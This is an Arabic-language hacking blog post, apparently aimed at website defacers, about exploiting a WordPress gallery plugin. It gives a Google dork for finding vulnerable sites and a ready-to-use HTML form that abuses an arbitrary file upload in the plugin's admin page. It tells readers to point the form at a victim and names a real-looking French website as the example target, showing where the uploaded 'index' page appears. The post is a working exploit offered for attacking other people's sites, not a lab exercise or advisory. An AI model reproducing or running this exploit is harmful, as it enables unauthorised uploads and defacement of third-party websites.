wordpress auto upload index

السلام عليكم أحبابي
اليوم جبتلكم ثغرة لرفع الاندكس في سكربتات الووردبرس
هذه الثغرة سهلة فقط تابع خطوة بخطوة
حسنا هذا الدورك
inurl:/wp-content/plugins/wp-dreamworkgallery/
نتوجه الى جوجل و  نقوم بوضعه
كما تلاحظون يوجد الكثير من المواقع المصابة بهذه الثغرة
html  حسنا نبدا الان بالاستغلال عن طريق كود
<html>
<body>
<form action="http://127.0.0.1/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
html تقوم بوضعه في المفكرة و تقوم بتسجيله بامتداد
ثم تقوم باختيار الموقع الضحية و تقوم بوضعه في الكود
مثلا أنا اخترت هذا الموقع
http://www.grainesdecalebasse.fr
عندما أرفع الاندكس سأجده في هذا المسار
http://www.grainesdecalebasse.fr/wp-content/uploads/dreamwork/662_uploadfolder/big/fucked.html
حض موفق للجميع

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

new dork sql 2016

اقوال الهكرز قالها مجهولون أفضل جمل و عبآرات يستخدمها الهكر عند الإختراق حصريا

الطريقة الصحيحة و المثلى في إختراق المواقع